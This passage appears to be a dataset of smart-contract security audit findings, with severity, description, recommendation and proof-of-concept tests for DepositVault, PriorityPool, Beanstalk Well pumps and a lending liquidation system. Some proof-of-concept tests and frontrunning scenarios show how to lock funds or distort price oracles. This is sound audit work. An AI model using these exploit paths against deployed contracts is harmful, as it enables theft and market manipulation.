amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n -The deposit function is not following CEI patternчlowчThe protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L47, we can see that the token transfer happens before updating the accounting state of the protocol against the CEI pattern. Because the protocol intends to support all ERC20 tokens, the tokens with hooks (e.g. ERC777) can be exploited for reentrancy. Although we can not verify an exploit that causes explicit loss due to this, it is still highly recommended to follow CEI pattern to prevent possible reentrancy attack.чHandle token transfers after updating the `deposits` state.чч```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n -Nonstandard usage of nonceчlowчThe protocol implemented two withdraw functions `withdrawDeposit()` and `withdraw()`. While the function `withdrawDeposit()` is designed to be used by the depositor themselves, the function `withdraw()` is designed to be used by anyone who has a signature from the depositor. The function `withdraw()` has a parameter `nonce` but the usage of this param is not aligned with the general meaning of `nonce`.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n\\nIn common usage, `nonce` is used to track the latest transaction from the EOA and generally it is increased on the user's transaction. It can be effectively used to invalidate the previous signature by the signer. But looking at the current implementation, the parameter `nonce` is merely used as an index to refer the `deposit` at a specific index.\\nThis is a bad naming and can confuse the users.чIf the protocol intended to provide a kind of invalidation mechanism using the nonce, there should be a separate mapping that stores the nonce for each user. The current nonce can be used to generate a signature and a depositor should be able to increase the nonce to invalidate the previous signatures. Also the nonce would need to be increased on every successful call to `withdraw()` to prevent replay attack. Please note that with this remediation, the mapping `usedWithdrawalHashes` can be removed completely because the hash will be always decided using the latest nonce and the nonce will be invalidated automatically (because it increases on successful call).\\nIf this is not what the protocol intended, the parameter nonce can be renamed to `depositIndex` as implemented in the function `withdrawDeposit()`.чч```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n -Unnecessary parameter amount in withdraw functionчlowчThe function `withdraw()` has a parameter `amount` but we don't understand the necessity of this parameter. At line L67, the `amount` is required to be the same to the whole deposit `amount`. This means the user does not have a flexibility to choose the withdraw `amount`, after all it means the parameter was not necessary at all.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\nчIf the protocol intends to only allow full withdrawal, this parameter can be removed completely (that will help save gas as well). Unnecessary parameters increase the complexity of the function and more error prone.чч```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n -Functions not used internally could be marked externalчlowчUsing proper visibility modifiers is a good practice to prevent unintended access to functions. Furthermore, marking functions as `external` instead of `public` can save gas.\\n```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\nчConsider change the visibility modifier to `external` for the functions that are not used internally.чч```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n -User's funds are locked temporarily in the PriorityPool contractчmediumчThe protocol intended to utilize the deposit queue for withdrawal to minimize the stake/unstake interaction with the staking pool. When a user wants to withdraw, they are supposed to call the function `PriorityPool::withdraw()` with the desired amount as a parameter.\\n```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n\\nAs we can see in the implementation, the protocol pulls the `_amount` of LSD tokens from the user first and then calls `_withdraw()` where the actual withdrawal utilizing the queue is processed.\\n```\\nfunction _withdraw(address _account, uint256 _amount) internal {\\n if (poolStatus == PoolStatus.CLOSED) revert WithdrawalsDisabled();\\n\\n uint256 toWithdrawFromQueue = _amount <= totalQueued ? _amount : totalQueued;//@audit-info if the queue is not empty, we use that first\\n uint256 toWithdrawFromPool = _amount - toWithdrawFromQueue;\\n\\n if (toWithdrawFromQueue != 0) {\\n totalQueued -= toWithdrawFromQueue;\\n depositsSinceLastUpdate += toWithdrawFromQueue;//@audit-info regard this as a deposit via the queue\\n }\\n\\n if (toWithdrawFromPool != 0) {\\n stakingPool.withdraw(address(this), address(this), toWithdrawFromPool);//@audit-info withdraw from pool into this contract\\n }\\n\\n //@audit-warning at this point, toWithdrawFromQueue of LSD tokens remain in this contract!\\n\\n token.safeTransfer(_account, _amount);//@audit-info\\n emit Withdraw(_account, toWithdrawFromPool, toWithdrawFromQueue);\\n}\\n```\\n\\nBut looking in the function `_withdraw()`, only `toWithdrawFromPool` amount of LSD tokens are withdrawn (burn) from the staking pool and `toWithdrawFromQueue` amount of LSD tokens remain in the `PriorityPool` contract. On the other hand, the contract tracks the queued amount for users by the mapping `accountQueuedTokens` and this leads to possible mismatch in the accounting. Due to this mismatch, a user's LSD tokens can be locked in the `PriorityPool` contract while the user sees his queued amount (getQueuedTokens()) is positive. Users can claim the locked LSD tokens once the function `updateDistribution` is called. Through the communication with the protocol team, it is understood that `updateDistribution` is expected to be called probably every 1-2 days unless there were any new deposits into the staking pool. So it means user's funds can be locked temporarily in the contract which is unfair for the user.чConsider add a feature to allow users to withdraw LSD tokens from the contract directly.чUser's LSD tokens can be locked temporarily in the PriorityPool contract\\nProof of Concept:\\n```\\n it('Cyfrin: user funds can be locked temporarily', async () => {\\n // try deposit 1500 while the capacity is 1000\\n await strategy.setMaxDeposits(toEther(1000))\\n await sq.connect(signers[1]).deposit(toEther(1500), true)\\n\\n // 500 ether is queued for accounts[1]\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 1000)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 8500)\\n assert.equal(fromEther(await sq.totalQueued()), 500)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 0)\\n\\n // at this point user calls withdraw (maybe by mistake?)\\n // withdraw swipes from the queue and the deposit room stays at zero\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n\\n // at this point getQueueTokens[accounts[1]] does not change but the queue is empty\\n // user will think his queue position did not change and he can simply unqueue\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 500)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9000)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n // NOTE: at this point 500 ethers of LSD tokens are locked in the queue contract\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // but unqueueTokens fails because actual totalQueued is zero\\n await expect(sq.connect(signers[1]).unqueueTokens(0, 0, [], toEther(500))).to.be.revertedWith(\\n 'InsufficientQueuedTokens()'\\n )\\n\\n // user's LSD tokens are still locked in the queue contract\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 0)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9500)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // user might try withdraw again but it will revert because user does not have any LSD tokens\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await expect(sq.connect(signers[1]).withdraw(toEther(500))).to.be.revertedWith(\\n 'Transfer amount exceeds balance'\\n )\\n\\n // in conclusion, user's LSD tokens are locked in the queue contract and he cannot withdraw them\\n // it is worth noting that the locked LSD tokens are credited once updateDistribution is called\\n // so the lock is temporary\\n })\\n```\\nч```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n -Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0чhighчThe current implementation of `GeoEmaAndCumSmaPump` assumes each well will call `update()` with non-zero reserves, as commented at the beginning of the file:\\n```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n\\nHowever, there is no actual requirement in `Well` to enforce pump updates with valid reserve values. Given that `GeoEmaAndCumSmaPump` restricts values to a minimum of 1 to prevent issues with the geometric mean, that the TWA values are not truly representative of the reserves in the `Well`, we believe it is worse than reverting in this case, although a `ConstantProduct2` `Well` can have zero reserves for either token via valid transactions.\\n```\\nGeoEmaAndCumSmaPump.sol\\n for (uint i; i < length; ++i) {\\n // Use a minimum of 1 for reserve. Geometric means will be set to 0 if a reserve is 0.\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], (reserves[i] > 0 ? reserves[i] : 1).fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\nчRevert the pump updates if they are called with zero reserve values.чUpdating pumps with zero reserve values can lead to the distortion of critical states likely to be utilized for price oracles. Given that the issue is exploitable through valid transactions, we assess the severity as HIGH. It is crucial to note that attackers can exploit this vulnerability to manipulate the price oracle.\\nProof of Concept: The test below shows that it is possible for reserves to be zero through valid transactions and updating pumps do not revert.\\n```\\nfunction testUpdateCalledWithZero() public {\\n address msgSender = 0x83a740c22a319FBEe5F2FaD0E8Cd0053dC711a1A;\\n changePrank(msgSender);\\n IERC20[] memory mockTokens = well.tokens();\\n\\n // add liquidity 1 on each side\\n uint amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, 1);\\n MockToken(address(mockTokens[1])).mint(msgSender, 1);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint[] memory tokenAmountsIn = new uint[](2);\\n tokenAmountsIn[0] = amount;\\n tokenAmountsIn[1] = amount;\\n uint minLpAmountOut = well.getAddLiquidityOut(tokenAmountsIn);\\n well.addLiquidity(\\n tokenAmountsIn,\\n minLpAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n // swaFromFeeOnTransfer from token1 to token0\\n msgSender = 0xfFfFFffFffffFFffFffFFFFFFfFFFfFfFFfFfFfD;\\n changePrank(msgSender);\\n amount = 79_228_162_514_264_337_593_543_950_334;\\n MockToken(address(mockTokens[1])).mint(msgSender, amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint minAmountOut = well.getSwapOut(\\n mockTokens[1],\\n mockTokens[0],\\n amount\\n );\\n\\n well.swapFromFeeOnTransfer(\\n mockTokens[1],\\n mockTokens[0],\\n amount,\\n minAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n increaseTime(120);\\n\\n // remove liquidity one token\\n msgSender = address(this);\\n changePrank(msgSender);\\n amount = 999_999_999_999_999_999_999_999_999;\\n uint minTokenAmountOut = well.getRemoveLiquidityOneTokenOut(\\n amount,\\n mockTokens[1]\\n );\\n well.removeLiquidityOneToken(\\n amount,\\n mockTokens[1],\\n minTokenAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n msgSender = address(12_345_678);\\n changePrank(msgSender);\\n\\n vm.warp(block.timestamp + 1);\\n amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, amount);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n uint amountOut = well.getSwapOut(mockTokens[0], mockTokens[1], amount);\\n\\n uint[] memory reserves = well.getReserves();\\n assertEq(reserves[1], 0);\\n\\n // we are calling `_update` with reserves of 0, this should fail\\n well.swapFrom(\\n mockTokens[0],\\n mockTokens[1],\\n amount,\\n amountOut,\\n msgSender,\\n block.timestamp\\n );\\n}\\n```\\nч```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n -`LibLastReserveBytes::storeLastReserves` has no check for reserves being too largeчmediumчAfter every liquidity event & swap, the IPump::update()is called. To update the pump, theLibLastReserveBytes::storeLastReservesfunction is used. This packs the reserve data intobytes32` slots in storage. A slot is then broken down into the following components:\\n1 byte for reserves array length\\n5 bytes for `timestamp`\\n16 bytes for each reserve balance\\nThis adds to 22 bytes total, but the function also attempts to pack the second reserve balance in the `bytes32` object. This would mean the `bytes32` would need 38 bytes total:\\n`1(length) + 5(timestamp) + 16(reserve balance 1) + 16(reserve balance 2) = 38 bytes`\\nTo fit all this data into the `bytes32`, the function cuts off the last few bytes of the reserve balances using shift, as shown below.\\n```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n\\nSo if the amount being stored is too large, the actual stored value will be different than what was expected to be stored.\\nOn the other hand, the `LibBytes.sol` does seem to have a check:\\n```\\nrequire(reserves[0] <= type(uint128).max, \"ByteStorage: too large\");\\n```\\n\\nThe `_setReserves` function calls this library after every reserve update in the well. So in practice, with the currently implemented wells & pumps, this check would cause a revert.\\nHowever, a well that is implemented without this check could additionally trigger the pumps to cut off reserve data, meaning prices would be incorrect.чWe recommend adding a check on the size of reserves in `LibLastReseveBytes`.\\nAdditionally, it is recommended to add comments to `LibLastReseveBytes` to inform users about the invariants of the system and how the max size of reserves should be equal to the max size of a `bytes16` and not a `uint256`.чWhile we assume users will be explicitly warned about malicious Wells and are unlikely to interact with invalid Wells, we assess the severity to be MEDIUM.\\nProof of Concept:\\n```\\nfunction testStoreAndReadTwo() public {\\n uint40 lastTimeStamp = 12345363;\\n bytes16[] memory reserves = new bytes16[](2);\\n reserves[0] = 0xffffffffffffffffffffffffffffffff; // This is too big!\\n reserves[1] = 0x11111111111111111111111100000000;\\n RESERVES_STORAGE_SLOT.storeLastReserves(lastTimeStamp, reserves);\\n (\\n uint8 n,\\n uint40 _lastTimeStamp,\\n bytes16[] memory _reserves\\n ) = RESERVES_STORAGE_SLOT.readLastReserves();\\n assertEq(2, n);\\n assertEq(lastTimeStamp, _lastTimeStamp);\\n assertEq(reserves[0], _reserves[0]); // This will fail\\n assertEq(reserves[1], _reserves[1]);\\n assertEq(reserves.length, _reserves.length);\\n}\\n```\\nч```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n +name,severity,description,recommendation,impact,function +"On liquidation, if netPnLE36 <= 0, the premium paid by the liquidator is locked in the contract.",high,"When liquidating a position, the liquidator is required to pay premium to Lender, which is accumulated in sharingProfitTokenAmts together with Lender's profit and paid to Lender in `_shareProfitsAndRepayAllDebts()`.\\n```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nHowever, if netPnLE36 <= 0, `_shareProfitsAndRepayAllDebts()` will not pay any profit to Lender and the premium in sharingProfitTokenAmts will also not be paid to Lender, which means that the premium paid by the liquidator will be locked in the contract.\\n```\\n function _shareProfitsAndRepayAllDebts( address _positionManager, address _posOwner, uint _posId,\\n int _netPnLE36, uint[] memory _shareProfitAmts, address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. if net pnl is positive, share profits to lending proxy\\n if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n }\\n```\\n\\nAlso, when the position is closed, the tokens in the contract will be sent to the caller, so the next person who closes the position will get the locked tokens.\\n```\\n underlyingAmts = new uint[](underlyingTokens.length);\\n for (uint i; i < underlyingTokens.length; ) {\\n underlyingAmts[i] = IERC20(underlyingTokens[i]).balanceOf(address(this));\\n if (underlyingAmts[i] < _params.minUnderlyingAmts[i]) {\\n revert TokenAmountLessThanExpected(\\n underlyingTokens[i],\\n underlyingAmts[i],\\n _params.minUnderlyingAmts[i]\\n );\\n }\\n _doRefund(underlyingTokens[i], underlyingAmts[i]);\\n unchecked {\\n ++i;\\n }\\n```\\n","Modify `shareProfitsAndRepayAllDebts()` as follows:\\n```\\n function _shareProfitsAndRepayAllDebts(\\n address _positionManager,\\n address _posOwner,\\n uint _posId,\\n int _netPnLE36,\\n uint[] memory _shareProfitAmts,\\n address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. if net pnl is positive, share profits to lending proxy\\n - if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n - }\\n```\\n",,"```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n" +The liquidated person can make the liquidator lose premium by adding collateral in advance,high,"When the position with debtRatioE18 >= 1e18 or startLiqTimestamp ! = 0, the position can be liquidated. On liquidation, the liquidator needs to pay premium, but the profit is related to the position's health factor and deltaTime, and when discount == 0, the liquidator loses premium.\\n```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? ((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n\\nConsider the following scenario.\\nAlice notices Bob's position with debtRatioE18 >= 1e18 and calls `liquidatePosition()` to liquidate.\\nBob observes Alice's transaction, frontruns a call `markLiquidationStatus()` to make startLiqTimestamp == block.timestamp, and calls `adjustExtraColls()` to bring the position back to the health state.\\nAlice's transaction is executed, and since the startLiqTimestamp of Bob's position.startLiqTimestamp ! = 0, it can be liquidated, but since discount = 0, Alice loses premium. This breaks the protocol's liquidation mechanism and causes the liquidator not to launch liquidation for fear of losing assets, which will lead to more bad debts","Consider having the liquidated person bear the premium, or at least have the liquidator use the minDiscount parameter to set the minimum acceptable discount.",,"```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? ((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n 